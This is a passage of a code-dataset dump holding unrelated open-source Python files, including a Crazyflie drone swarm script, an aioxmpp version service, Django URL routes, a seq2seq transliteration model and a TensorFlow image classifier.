z0, 3.0),\n (x0, y0, z, 30.0),\n (x0, y0, z0, 3.0),\n]\n\nsequence2 = [\n (x0, y1, z0, 3.0),\n (x0, y1, z, 30.0),\n (x0, y1, z0, 3.0),\n]\n\nsequence3 = [\n (x0, y2, z0, 3.0),\n (x0, y2, z, 30.0),\n (x0, y2, z0, 3.0),\n]\n\nsequence4 = [\n (x0, y3, z0, 3.0),\n (x0, y3, z, 30.0),\n (x0, y3, z0, 3.0),\n]\n\nsequence5 = [\n (x1, y1, z0, 3.0),\n (x1, y1, z, 30.0),\n (x1, y1, z0, 3.0),\n]\n\nsequence6 = [\n (x1, y2, z0, 3.0),\n (x1, y2, z, 30.0),\n (x1, y2, z0, 3.0),\n]\n\nsequence7 = [\n (x2, y0, z0, 3.0),\n (x2, y0, z, 30.0),\n (x2, y0, z0, 3.0),\n]\n\nsequence8 = [\n (x2, y1, z0, 3.0),\n (x2, y1, z, 30.0),\n (x2, y1, z0, 3.0),\n]\n\nsequence9 = [\n (x2, y2, z0, 3.0),\n (x2, y2, z, 30.0),\n (x2, y2, z0, 3.0),\n]\n\nsequence10 = [\n (x2, y3, z0, 3.0),\n (x2, y3, z, 30.0),\n (x2, y3, z0, 3.0),\n]\n\nseq_args = {\n URI1: [sequence1],\n URI2: [sequence2],\n URI3: [sequence3],\n URI4: [sequence4],\n URI5: [sequence5],\n URI6: [sequence6],\n URI7: [sequence7],\n URI8: [sequence8],\n URI9: [sequence9],\n URI10: [sequence10],\n}\n\n# List of URIs, comment the one you do not want to fly\nuris = {\n URI1,\n URI2,\n URI3,\n URI4,\n URI5,\n URI6,\n URI7,\n URI8,\n URI9,\n URI10\n}\n\n\ndef wait_for_position_estimator(scf):\n print('Waiting for estimator to find position...')\n\n log_config = LogConfig(name='Kalman Variance', period_in_ms=500)\n log_config.add_variable('kalman.varPX', 'float')\n log_config.add_variable('kalman.varPY', 'float')\n log_config.add_variable('kalman.varPZ', 'float')\n\n var_y_history = [1000] * 10\n var_x_history = [1000] * 10\n var_z_history = [1000] * 10\n\n threshold = 0.001\n\n with SyncLogger(scf, log_config) as logger:\n for log_entry in logger:\n data = log_entry[1]\n\n var_x_history.append(data['kalman.varPX'])\n var_x_history.pop(0)\n var_y_history.append(data['kalman.varPY'])\n var_y_history.pop(0)\n var_z_history.append(data['kalman.varPZ'])\n var_z_history.pop(0)\n\n min_x = min(var_x_history)\n max_x = max(var_x_history)\n min_y = min(var_y_history)\n max_y = max(var_y_history)\n min_z = min(var_z_history)\n max_z = max(var_z_history)\n\n # print(\"{} {} {}\".\n # format(max_x - min_x, max_y - min_y, max_z - min_z))\n\n if (max_x - min_x) < threshold and (\n max_y - min_y) < threshold and (\n max_z - min_z) < threshold:\n break\n\n\ndef wait_for_param_download(scf):\n while not scf.cf.param.is_updated:\n time.sleep(1.0)\n print('Parameters downloaded for', scf.cf.link_uri)\n\n\ndef reset_estimator(scf):\n cf = scf.cf\n cf.param.set_value('kalman.resetEstimation', '1')\n time.sleep(0.1)\n cf.param.set_value('kalman.resetEstimation', '0')\n\n wait_for_position_estimator(cf)\n\n\ndef take_off(cf, position):\n take_off_time = 1.0\n sleep_time = 0.1\n steps = int(take_off_time / sleep_time)\n vz = position[2] / take_off_time\n\n print(vz)\n\n for i in range(steps):\n cf.commander.send_velocity_world_setpoint(0, 0, vz, 0)\n time.sleep(sleep_time)\n\n\ndef land(cf, position):\n landing_time = 1.0\n sleep_time = 0.1\n steps = int(landing_time / sleep_time)\n vz = -position[2] / landing_time\n\n print(vz)\n\n for _ in range(steps):\n cf.commander.send_velocity_world_setpoint(0, 0, vz, 0)\n time.sleep(sleep_time)\n\n cf.commander.send_stop_setpoint()\n # Make sure that the last packet leaves before the link is closed\n # since the message queue is not flushed before closing\n time.sleep(0.1)\n\n\ndef run_sequence(scf, sequence):\n try:\n cf = scf.cf\n\n take_off(cf, sequence[0])\n for position in sequence:\n print('Setting position {}'.format(position))\n end_time = time.time() + position[3]\n while time.time() < end_time:\n cf.commander.send_position_setpoint(position[0],\n position[1],\n position[2], 0)\n time.sleep(0.1)\n land(cf, sequence[-1])\n except Exception as e:\n print(e)\n\n\nif __name__ == '__main__':\n # logging.basicConfig(level=logging.DEBUG)\n cflib.crtp.init_drivers(enable_debug_driver=False)\n\n factory = CachedCfFactory(rw_cache='./cache')\n with Swarm(uris, factory=factory) as swarm:\n # If the copters are started in their correct positions this is\n # probably not needed. The Kalman filter will have time to converge\n # any way since it takes a while to start them all up and connect. We\n # keep the code here to illustrate how to do it.\n # swarm.parallel(reset_estimator)\n\n # The current values of all parameters are downloaded as a part of the\n # connections sequence. Since we have 10 copters this is clogging up\n # communication and we have to wait for it to finish before we start\n # flying.\n print('Waiting for parameters to be downloaded...')\n swarm.parallel(wait_for_param_download)\n\n swarm.parallel(run_sequence, args_dict=seq_args)\n","repo_name":"hibetterheyj/Crazyflie_Auto_Navigation_Landing","sub_path":"code/crazyflie-lib-python/examples/swarm/swarmSequence.py","file_name":"swarmSequence.py","file_ext":"py","file_size_in_byte":6039,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"43579743605","text":"\"\"\"\nA module used for communication between the server and the applications.\nAlso can be used to set up an environment for the applications to run\nas standalone python scripts.\n\"\"\"\n\nfrom dynamo.core.inventory import ObjectRepository\n\n## Whether this process has elevated privileges\nauthorized = False\n\n## Handle to the inventory\ninventory = ObjectRepository()\n\n## Handle to the authorizer part of the master server\nauthorizer = None\n\n## Make a standard logger that outputs to sys.stdout and sys.stderr\nimport sys\nimport logging\n\ndef make_standard_logger(level):\n log_level = getattr(logging, level.upper())\n log_format = '%(asctime)s:%(levelname)s:%(name)s: %(message)s'\n \n # Everything above log_level goes to stdout\n out_handler = logging.StreamHandler(sys.stdout)\n out_handler.setLevel(log_level)\n out_handler.setFormatter(logging.Formatter(fmt = log_format))\n # If >= ERROR, goes also to stderr\n err_handler = logging.StreamHandler(sys.stderr)\n err_handler.setLevel(logging.ERROR)\n err_handler.setFormatter(logging.Formatter(fmt = log_format))\n \n logger = logging.getLogger()\n logger.setLevel(log_level)\n logger.addHandler(out_handler)\n logger.addHandler(err_handler)\n\n return logger\n","repo_name":"SmartDataProjects/dynamo","sub_path":"lib/core/executable.py","file_name":"executable.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32684320846","text":"########################################################################\n# File name: service.py\n# This file is part of: aioxmpp\n#\n# LICENSE\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this program. If not, see\n# .\n#\n########################################################################\nimport asyncio\nimport typing\n\nimport aioxmpp\nimport aioxmpp.disco\nimport aioxmpp.errors\nimport aioxmpp.service\n\nfrom . import xso as version_xso\n\n\nclass VersionServer(aioxmpp.service.Service):\n \"\"\"\n :class:`~aioxmpp.service.Service` which handles inbound :xep:`92` Software\n Version requests.\n\n .. warning::\n\n Do **not** depend on this service in another service. This service\n exposes possibly private or sensitive information over the XMPP\n network without any filtering. Implicitly summoning this service via\n a dependency is thus discouraged.\n\n *If* you absolutely need to do this for the implementation of another\n published XEP, please file an issue against :mod:`aioxmpp` so that we\n can work out a good solution.\n\n .. warning::\n\n This service does answer version queries, no matter who asks. This may\n not be desirable, in which case this service is not for you.\n\n .. seealso::\n\n :func:`~.version.query_version`\n for a function to obtain another entities software version.\n\n .. note::\n\n By default, this service does not reply to version queries. The\n :attr:`name` attribute needs to be set first.\n\n The response can be configured with the following attributes:\n\n .. autoattribute:: name\n :annotation: = None\n\n .. autoattribute:: version\n :annotation: = None\n\n .. autoattribute:: os\n :annotation: = distro.name() or platform.system()\n \"\"\"\n\n ORDER_AFTER = [\n aioxmpp.disco.DiscoServer,\n ]\n\n disco_feature = aioxmpp.disco.register_feature(\n \"jabber:iq:version\",\n )\n\n def __init__(self, client, **kwargs):\n super().__init__(client, **kwargs)\n try:\n import distro\n except ImportError:\n import platform\n self._os = platform.system()\n else:\n self._os = distro.name()\n\n self._name = None\n self._version = None\n\n @property\n def os(self) -> typing.Optional[str]:\n \"\"\"\n The operating system of this entity.\n\n Defaults to :func:`distro.name` or :func:`platform.system` (if\n :mod:`distro` is not available).\n\n This attribute can be set to :data:`None` or deleted to prevent\n inclusion of the OS element in the reply.\n \"\"\"\n return self._os\n\n @os.setter\n def os(self, value: typing.Optional[str]):\n if value is None:\n self._os = None\n else:\n self._os = str(value)\n\n @os.deleter\n def os(self):\n self._os = None\n\n @property\n def name(self) -> typing.Optional[str]:\n \"\"\"\n The software name of this entity.\n\n Defaults to :data:`None`.\n\n If this attribute is :data:`None`, version requests are not answered\n but fail with a ``service-unavailable`` error.\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, value: typing.Optional[str]):\n if value is None:\n self._name = None\n else:\n self._name = str(value)\n\n @name.deleter\n def name(self):\n self._name = None\n\n @property\n def version(self) -> typing.Optional[str]:\n \"\"\"\n The software version of this entity.\n\n Defaults to :data:`None`.\n\n If this attribute is :data:`None` or the empty string, the version will\n be shown as ``\"unspecified\"`` to other entities. This can be used to\n avoid disclosing the specific version of the software.\n \"\"\"\n return self._version\n\n @version.setter\n def version(self, value: typing.Optional[str]):\n if value is None:\n self._version = None\n else:\n self._version = str(value)\n\n @version.deleter\n def version(self):\n self._version = None\n\n @aioxmpp.service.iq_handler(aioxmpp.IQType.GET,\n version_xso.Query)\n async def handle_query(self, iq: aioxmpp.IQ) -> version_xso.Query:\n if self._name is None:\n raise aioxmpp.errors.XMPPCancelError(\n aioxmpp.errors.ErrorCondition.SERVICE_UNAVAILABLE,\n )\n\n result = version_xso.Query()\n result.name = self._name\n result.os = self._os\n result.version = self._version or \"unspecified\"\n return result\n\n\nasync def query_version(stream: aioxmpp.stream.StanzaStream,\n target: aioxmpp.JID) -> version_xso.Query:\n \"\"\"\n Query the software version of an entity.\n\n :param stream: A stanza stream to send the query on.\n :type stream: :class:`aioxmpp.stream.StanzaStream`\n :param target: The address of the entity to query.\n :type target: :class:`aioxmpp.JID`\n :raises OSError: if a connection issue occurred before a reply was received\n :raises aioxmpp.errors.XMPPError: if an XMPP error was returned instead\n of a reply.\n :rtype: :class:`aioxmpp.version.xso.Query`\n :return: The response from the peer.\n\n The response is returned as :class:`~aioxmpp.version.xso.Query` object. The\n attributes hold the data returned by the peer. Each attribute may be\n :data:`None` if the peer chose to omit that information. In an extreme\n case, all attributes are :data:`None`.\n \"\"\"\n\n return await stream.send(aioxmpp.IQ(\n type_=aioxmpp.IQType.GET,\n to=target,\n payload=version_xso.Query(),\n ))\n","repo_name":"horazont/aioxmpp","sub_path":"aioxmpp/version/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":6283,"program_lang":"python","lang":"en","doc_type":"code","stars":215,"dataset":"github-code","pt":"21"} +{"seq_id":"37145040336","text":"from datetime import datetime\n\nfrom .feedreel import FeedReel\nfrom .feedpost import FeedPost\nfrom .feedstory import FeedStory\nfrom .audio_file import AudioFile\nfrom .business import Business\n\n\nclass User(Business):\n \"\"\"\n Platform users creation\n \"\"\"\n username = None\n bio = None\n followers = 0\n following = 0\n address = None\n\n def __init__(self, username, bio=None, **kwargs):\n self.username = username\n self.user_pic = []\n self.load_userpic()\n self.bio = bio\n self.user_new_attributes = kwargs\n for key, value in kwargs.items():\n setattr(self, key, value)\n\n def load_userpic(self):\n print('Load your picture and hit Ctrl-D',\n 'or Ctrl-Z ( windows ) to save it.')\n while True:\n try:\n line = input()\n except EOFError:\n break\n self.user_pic.append(line)\n try:\n if line:\n return True\n except UnboundLocalError:\n print('Picture load failed')\n return False\n\n def print_userpic(self):\n if self.user_pic:\n print('')\n for linea in self.user_pic:\n if linea:\n print(linea)\n print('')\n\n def show_followers(self):\n '''\n Prints the number of likes for the instance\n '''\n print(f'This user has {self.followers} followers')\n\n def show_following(self):\n '''\n Prints the number of likes for the instance\n '''\n print(f'This user follows {self.following} users')\n\n def show_bio(self):\n if self.bio:\n return self.bio\n else:\n return \"This post doesn't have a description\"\n\n def read_user(self):\n print('#'*15, 'USER', '#'*15)\n print(self.username)\n self.print_userpic()\n self.show_bio()\n print('Address: ')\n print(self.address)\n self.show_followers()\n self.show_following()\n for key, value in self.user_new_attributes.items():\n print(f'{key} = {value}')\n print('#'*80)\n\n def read_feed(self, feed):\n for post in feed:\n post.read()\n\n def post(self):\n description = input('Add your post description\\n>')\n print('Type:\\n 1. To type your location\\n',\n '2. To pick a random one')\n location_choice = int(input('>'))\n if location_choice == 1:\n location = input('Type your location: ')\n else:\n location = FeedPost.get_location()\n new_post = FeedPost(location, description)\n\n if new_post.load_picture(\"picture\"):\n print(\"Picture loaded!\")\n else:\n print(\"Couldn't load picture\")\n return False\n new_post.set_filter()\n new_post.tag_people()\n return new_post\n\n def story(self):\n description = input('Add the title for your story\\n>')\n print('Type:\\n 1. To enter a personalized created time\\n',\n '2. To set it automatically')\n creation_choice = int(input('>'))\n if creation_choice == 1:\n print(\"Type the created time in the 'dd/mm/yyyy 24:00:00' format\")\n created = datetime.strptime(input('>'), '%d/%m/%Y %H:%M:%S')\n else:\n created = datetime.now()\n print('Created time: ', created.strftime(\"%d/%m/%Y %H:%M:%S\"))\n new_story = FeedStory(created, description)\n story_picture = input(\n 'Do you want to load a picture with your story? Y/N\\n>').title()\n if story_picture == 'Y':\n if new_story.load_picture(\"picture\"):\n print(\"Picture loaded!\")\n else:\n print(\"Couldn't load picture\")\n return False\n elif story_picture == 'N':\n new_story.picture = None\n new_story.set_typography()\n new_story.tag_people()\n return new_story\n\n def reel(self):\n description = input('Add a title for your reel\\n>')\n new_reel = FeedReel(description)\n if new_reel.load_picture(\"video\"):\n print(\"Video loaded!\")\n else:\n print(\"Couldn't load video\")\n return False\n reel_music = input(\n 'Do you want background music in the reel? Y/N\\n>').title()\n if reel_music == 'Y':\n new_reel.add_music()\n new_reel.music = AudioFile(new_reel.music_background)\n elif reel_music == 'N':\n new_reel.music_background = None\n reel_effect = input(\n 'Do you want a visual effect in the reel? Y/N\\n>').title()\n if reel_effect == 'Y':\n new_reel.add_effects()\n elif reel_effect == 'N':\n new_reel.visual_effect = None\n return new_reel\n\n def give_likes(self, item):\n item.likes += 1\n return True\n\n\nclass Address:\n \"\"\"docstring for Address.\"\"\"\n\n def __init__(self, street, city, state, zipcode, street2=''):\n self.street = street\n self.city = city\n self.state = state\n self.zipcode = zipcode\n self.street2 = street2\n\n def __str__(self):\n lines = [self.street]\n if self.street2:\n lines.append(self.street2)\n lines.append(f'{self.city}, {self.state} {self.zipcode}')\n return '\\n'.join(lines)\n","repo_name":"Jhilbran/Instagram_console_test","sub_path":"modules/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":5368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7299008827","text":"from ete3 import NCBITaxa\nimport itertools\n\nZhangZhaoGenera = []\nwith open('/home/ubuntu/MATLAB/GutMicrobiota/output/writeETEFiles/ZhangZhaoGenera.txt') as f:\n for line in f:\n ZhangZhaoGenera.append(line.strip())\n f.close()\n\nForslundHildebrandGenera = []\nwith open('/home/ubuntu/MATLAB/GutMicrobiota/output/writeETEFiles/ForslundHildebrandGenera.txt') as f:\n for line in f:\n ForslundHildebrandGenera.append(line.strip())\n f.close()\n\nRefSeqSpecies = []\nwith open('/home/ubuntu/MATLAB/GutMicrobiota/input/reference_genomes.txt') as f:\n next(f)\n for line in f:\n words = line.split('\\t')\n RefSeqSpecies.append(words[0])\n f.close()\n\nncbi = NCBITaxa()\nname2taxid = ncbi.get_name_translator(list(set(ZhangZhaoGenera+ForslundHildebrandGenera+RefSeqSpecies)))\n\ntree = ncbi.get_topology(list(itertools.chain.from_iterable(list(name2taxid.values()))),intermediate_nodes=True)\n#print(tree.get_ascii(attributes=['sci_name']), file=open('/home/ubuntu/taxonomy.txt','w'))\n\n#print(tree.name)\n# fh = open('/home/ubuntu/MATLAB/GutMicrobiota/output/writeETEFiles/closestSpecies.txt','w')\n# for genus in ZhangZhaoGenera+ForslundHildebrandGenera:\n# print(genus)\n# minDist = -1\n# minDistSpecies = ''\n# for species in RefSeqSpecies:\n# genusNode = tree.search_nodes(name=str(name2taxid[genus][0]))[0]\n# speciesNode = tree.search_nodes(name=str(name2taxid[species][0]))[0]\n# dist = tree.get_distance(speciesNode, genusNode)\n# if minDist == -1:\n# minDist = dist\n# minDistSpecies = species\n# elif minDist > dist:\n# minDist = dist\n# minDistSpecies = species\n# print(genus+\" \"+minDistSpecies+\" \"+str(minDist))\n# print(genus+\"\\t\"+minDistSpecies,file=fh)\n# fh.close()\n\nfh = open('/home/ubuntu/MATLAB/GutMicrobiota/output/writeETEFiles/allDescendants.txt','w')\nfor genus in ZhangZhaoGenera+ForslundHildebrandGenera:\n print(genus)\n genusNode = tree.search_nodes(name=str(name2taxid[genus][0]))[0]\n #descendants = genusNode.get_descendants()\n #descendantNames = []\n #for d in descendants:\n # descendantNames.append(d.name)\n descendants = ncbi.get_descendant_taxa(str(name2taxid[genus][0]),intermediate_nodes=True)\n descendantNames = [str(name2taxid[genus][0])]\n for d in descendants:\n descendantNames.append(str(d))\n fh.write(genus+\"\\t\"+\",\".join(descendantNames))#,file=fh)\nfh.close()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"yw595/GutMicrobiota","sub_path":"makeETEFiles.py","file_name":"makeETEFiles.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43039849847","text":"def main():\n n, q = map(int, input().split())\n point_list = []\n for _ in range(n):\n x, y = map(int, input().split())\n point_list.append((x, y))\n\n # (1, 0) -> (1, 1)\n # (0, 1) -> (1, -1)\n new_point_list = []\n for x, y in point_list:\n new_x = x + y\n new_y = x - y\n new_point_list.append((new_x, new_y))\n\n x_list = []\n y_list = []\n for x, y in new_point_list:\n x_list.append(x)\n y_list.append(y)\n x_max = max(x_list)\n x_min = min(x_list)\n y_max = max(y_list)\n y_min = min(y_list)\n\n ans_list = []\n for _ in range(q):\n i = int(input())\n i -= 1\n x, y = new_point_list[i]\n ans = -1\n ans = max(ans, x_max-x)\n ans = max(ans, x-x_min)\n ans = max(ans, y_max-y)\n ans = max(ans, y-y_min)\n ans_list.append(ans)\n\n print(*ans_list, sep='\\n')\n\n\nmain()\n","repo_name":"batamorphism/coding","sub_path":"Python/AtCoder/old/typical90_0330.py","file_name":"typical90_0330.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6491511083","text":"import os\n\nimport pymysql\nimport csv\n\n# 数据处理好,看如何塞入execl中\n\n\ndef csv_dict_write(path,head,data):\n with open(path,'w',encoding='utf-8',newline='') as f:\n writer = csv.DictWriter(f,head)\n writer.writeheader()\n writer.writerows(data)\n return True\n\n\n\nif __name__ =='__main__':\n connection = pymysql.connect(host='127.0.0.1', port=3306, user='root', password='123456', db='hk_stock',\n charset='utf8mb4', cursorclass=pymysql.cursors.DictCursor)\n cur = connection.cursor()\n\n # sql 语句\n count_sql = \"select count(*) from hk_FinData1; \"\n cur.execute(count_sql)\n long_count = cur.fetchone()['count(*)']\n # sql 语句\n big_list = []\n for num in range(1, long_count):\n\n\n sql = 'select code,d1,d2,d3,d4,d5,d6,d7,d8 from hk_FinData1 where id = %s ' % num\n # #执行sql语句\n cur.execute(sql)\n # #获取所有记录列表\n data = cur.fetchone()\n big_list.append(data)\n print(big_list)\n head = ['code','d1','d2','d3','d4','d5','d6','d7','d8']\n l_path = os.getcwd()\n csv_dict_write('{0}/hk50_Fdata.csv'.format(l_path),head,big_list)\n print(\"数据导出完成~\")\n\n","repo_name":"mojoru2023/HK_stocks","sub_path":"恒生指数成分股模型/从数据库导出数据/mysql_python.py","file_name":"mysql_python.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"17986636970","text":"from django.urls.conf import path, re_path\n\nfrom .views import tag_detail, tag_list, startup_list, startup_detail, TagCreate, StartupCreate, NewsLinkCreate, NewsLinkUpdate, TagUpdate, NewsLinkDelete, TagDelete, StartupDelete, StartupUpdate\n\nurlpatterns = [\n re_path(r'^newslink/create/$', NewsLinkCreate.as_view(), name='organizer_newslink_create'),\n re_path(r'^newslink/delete/(?P\\d+)/$', NewsLinkDelete.as_view(), name='organizer_newslink_delete'),\n re_path(r'^newslink/update/(?P\\d+)/$', NewsLinkUpdate.as_view(), name= 'organizer_newslink_update'),\n re_path(r'^startup/$', startup_list, name='organizer_startup_list'),\n re_path(r'^startup/create/$', StartupCreate.as_view, name='organzer_startup_create'),\n re_path(r'^startup/(?P[\\w\\-]+)/update/$', StartupUpdate.as_view(), name='organizer_startup_update'),\n re_path(r'startup/(?P[\\w\\-]+)/$', startup_detail, name='organizer_startup_detail'),\n re_path(r'^startup/(?P[\\w\\-]+)/delete/$', StartupDelete.as_view(), name='organizer_startup_delete'),\n re_path(r'^tag/$', tag_list, name='organizer_tag_list'),\n re_path(r'^tag/create/$', TagCreate.as_view(), name='organizer_tag_create'),\n re_path(r'^tag/(?P[\\w\\-]+)/update/$', TagUpdate.as_view(), name='organizer_tag_update'),\n re_path(r'^tag/(?P[\\w\\-]+)/$', tag_detail, name='organizer_tag_detail'),\n re_path(r'^tag/(?P[\\w-]+)/delete/$', TagDelete.as_view(), name='organizer_tag_delete'),\n]\n","repo_name":"3douhao/unleashed","sub_path":"organizer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"285673016","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom src.helper import get_optimizer, tensorsFromPair, get_languages, tensorFromWord, get_data\nfrom src.language import SOS_token, EOS_token\nfrom src.encoder import Encoder\nfrom src.decoder import Decoder\nimport random\nimport time\nimport numpy as np\n\nPRINT_EVERY = 5000\nPLOT_EVERY = 100\n\nclass Translator:\n def __init__(self, lang: str, params: dict, device: str):\n self.lang = lang\n self.input_lang, self.output_lang, self.pairs = get_languages(self.lang)\n self.input_size = self.input_lang.n_chars\n self.output_size = self.output_lang.n_chars\n self.device = device\n\n self.training_pairs = [tensorsFromPair(self.input_lang, self.output_lang, pair, self.device) for pair in self.pairs]\n\n self.encoder = Encoder(in_sz = self.input_size,\n embed_sz = params[\"embed_size\"],\n hidden_sz = params[\"hidden_size\"],\n cell_type = params[\"cell_type\"],\n n_layers = params[\"num_layers\"],\n dropout = params[\"dropout\"],\n device=self.device).to(self.device)\n \n self.decoder = Decoder(out_sz = self.output_size,\n embed_sz = params[\"embed_size\"],\n hidden_sz = params[\"hidden_size\"],\n cell_type = params[\"cell_type\"],\n n_layers = params[\"num_layers\"],\n dropout = params[\"dropout\"],\n device=self.device).to(self.device)\n\n self.encoder_optimizer = get_optimizer(params[\"optimizer\"])(self.encoder.parameters(), lr=params[\"learning_rate\"])\n self.decoder_optimizer = get_optimizer(params[\"optimizer\"])(self.decoder.parameters(), lr=params[\"learning_rate\"])\n \n self.criterion = nn.NLLLoss()\n\n self.teacher_forcing_ratio = params[\"teacher_forcing_ratio\"]\n self.max_length = params[\"max_length\"]\n\n def train_single(self, input_tensor, target_tensor):\n encoder_hidden = self.encoder.initHidden()\n encoder_cell = self.encoder.initHidden()\n\n self.encoder_optimizer.zero_grad()\n self.decoder_optimizer.zero_grad()\n\n input_length = input_tensor.size(0)\n target_length = target_tensor.size(0)\n\n encoder_outputs = torch.zeros(self.max_length, self.encoder.hidden_sz, device=self.device)\n\n loss = 0\n\n for ei in range(input_length):\n encoder_output, encoder_hidden, encoder_cell = self.encoder(input_tensor[ei], encoder_hidden, encoder_cell)\n encoder_outputs[ei] = encoder_output[0, 0]\n\n decoder_input = torch.tensor([[SOS_token]], device=self.device)\n decoder_hidden, decoder_cell = encoder_hidden, encoder_cell\n\n use_teacher_forcing = True if random.random() < self.teacher_forcing_ratio else False\n\n if use_teacher_forcing:\n for di in range(target_length):\n decoder_output, decoder_hidden, decoder_cell = self.decoder(decoder_input, decoder_hidden, decoder_cell)\n loss += self.criterion(decoder_output, target_tensor[di])\n\n decoder_input = target_tensor[di]\n else:\n for di in range(target_length):\n decoder_output, decoder_hidden, decoder_cell = self.decoder(decoder_input, decoder_hidden, decoder_cell)\n loss += self.criterion(decoder_output, target_tensor[di])\n\n topv, topi = decoder_output.topk(1)\n decoder_input = topi.squeeze().detach()\n if decoder_input.item() == EOS_token:\n break\n\n loss.backward()\n self.encoder_optimizer.step()\n self.decoder_optimizer.step()\n\n return loss.item() / target_length\n \n def train(self, iters=-1):\n start_time = time.time()\n plot_losses = []\n print_loss_total = 0\n plot_loss_total = 0\n\n random.shuffle(self.training_pairs)\n iters = len(self.training_pairs) if iters == -1 else iters\n\n for iter in range(1, iters+1):\n training_pair = self.training_pairs[iter - 1]\n input_tensor = training_pair[0]\n target_tensor = training_pair[1]\n\n loss = self.train_single(input_tensor, target_tensor)\n print_loss_total += loss\n plot_loss_total += loss\n\n if iter % PRINT_EVERY == 0:\n print_loss_avg = print_loss_total / PRINT_EVERY\n print_loss_total = 0\n current_time = time.time()\n print(\"Loss: {:.4f} | Iterations: {} | Time: {:.3f}\".format(print_loss_avg, iter, current_time - start_time))\n\n if iter % PLOT_EVERY == 0:\n plot_loss_avg = plot_loss_total / PLOT_EVERY\n plot_losses.append(plot_loss_avg)\n plot_loss_total = 0\n \n return plot_losses\n \n def evaluate(self, word):\n with torch.no_grad():\n input_tensor = tensorFromWord(self.input_lang, word, self.device)\n input_length = input_tensor.size()[0]\n encoder_hidden = self.encoder.initHidden()\n encoder_cell = self.encoder.initHidden()\n\n encoder_outputs = torch.zeros(self.max_length, self.encoder.hidden_sz, device=self.device)\n\n for ei in range(input_length):\n encoder_output, encoder_hidden, encoder_cell = self.encoder(input_tensor[ei], encoder_hidden, encoder_cell)\n encoder_outputs[ei] += encoder_output[0, 0]\n\n decoder_input = torch.tensor([[SOS_token]], device=self.device)\n decoder_hidden, decoder_cell = encoder_hidden, encoder_cell\n\n decoded_chars = \"\"\n\n for di in range(self.max_length):\n decoder_output, decoder_hidden, decoder_cell = self.decoder(decoder_input, decoder_hidden, decoder_cell)\n topv, topi = decoder_output.topk(1)\n \n if topi.item() == EOS_token:\n break\n else:\n decoded_chars += self.output_lang.index2word[topi.item()]\n\n decoder_input = topi.squeeze().detach()\n\n return decoded_chars\n \n def test_validate(self, type:str):\n pairs = get_data(self.lang, type)\n accuracy = np.sum([self.evaluate(pair[0]) == pair[1] for pair in pairs])\n return accuracy / len(pairs)","repo_name":"bersilin-robert1609/CS6910-Assignment3","sub_path":"src/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":6542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8312146210","text":"import numpy as np\r\nimport tensorflow as tf\r\nimport os\r\nimport matplotlib.pyplot as plt\r\n# plt.ion()\r\n\r\n\r\ndef read_files(file_dir, n_data_set):\r\n # list initialization\r\n cat_data = []\r\n dog_data = []\r\n cat_label = []\r\n dog_label = []\r\n\r\n valid_format = [\".jpg\"]\r\n\r\n # read cat images\r\n for file in os.listdir(file_dir + \"\\\\Cat\"):\r\n ext = os.path.splitext(file)[1]\r\n if ext.lower() not in valid_format:\r\n continue\r\n cat_data.append(file_dir + \"\\\\Cat\\\\\" + file)\r\n cat_label.append(0)\r\n if len(cat_label) >= n_data_set:\r\n break\r\n\r\n # read dog images\r\n for file in os.listdir(file_dir + \"\\\\Dog\"):\r\n ext = os.path.splitext(file)[1]\r\n if ext.lower() not in valid_format:\r\n continue\r\n dog_data.append(file_dir + \"\\\\Dog\\\\\" + file)\r\n dog_label.append(1)\r\n if len(dog_label) >= n_data_set:\r\n break\r\n\r\n image_list = np.hstack((cat_data, dog_data))\r\n label_list = np.hstack((cat_label, dog_label))\r\n\r\n data_array = np.array([image_list, label_list]).transpose()\r\n np.random.shuffle(data_array)\r\n\r\n image_list = list(data_array[:, 0])\r\n label_list = list(data_array[:, 1])\r\n label_list = [int(i) for i in label_list]\r\n\r\n return image_list, label_list\r\n\r\n\r\ndef get_batch(image, label, width, height, batch_size):\r\n image = tf.cast(image, tf.string)\r\n label = tf.cast(label, tf.int32)\r\n\r\n train_input_queue = tf.train.slice_input_producer([image, label], shuffle=False)\r\n image_content = tf.read_file(train_input_queue[0])\r\n image = tf.image.decode_jpeg(image_content, channels=3)\r\n image = tf.image.resize_image_with_crop_or_pad(image, target_width=width, target_height=height)\r\n image = tf.image.per_image_standardization(image)\r\n label = train_input_queue[1]\r\n image_batch, label_batch = tf.train.batch([image, label], batch_size=batch_size)\r\n label_batch = tf.reshape(label_batch, [batch_size])\r\n\r\n return image_batch, label_batch\r\n\r\n\r\n\r\ndef inference (image, batch_size, n_class):\r\n with tf.variable_scope('conv_layer1') as scope:\r\n w = tf.get_variable('weights',\r\n shape=[3, 3, 3, 16],\r\n dtype=tf.float32,\r\n initializer=tf.truncated_normal_initializer(stddev=0.1, dtype=tf.float32))\r\n b = 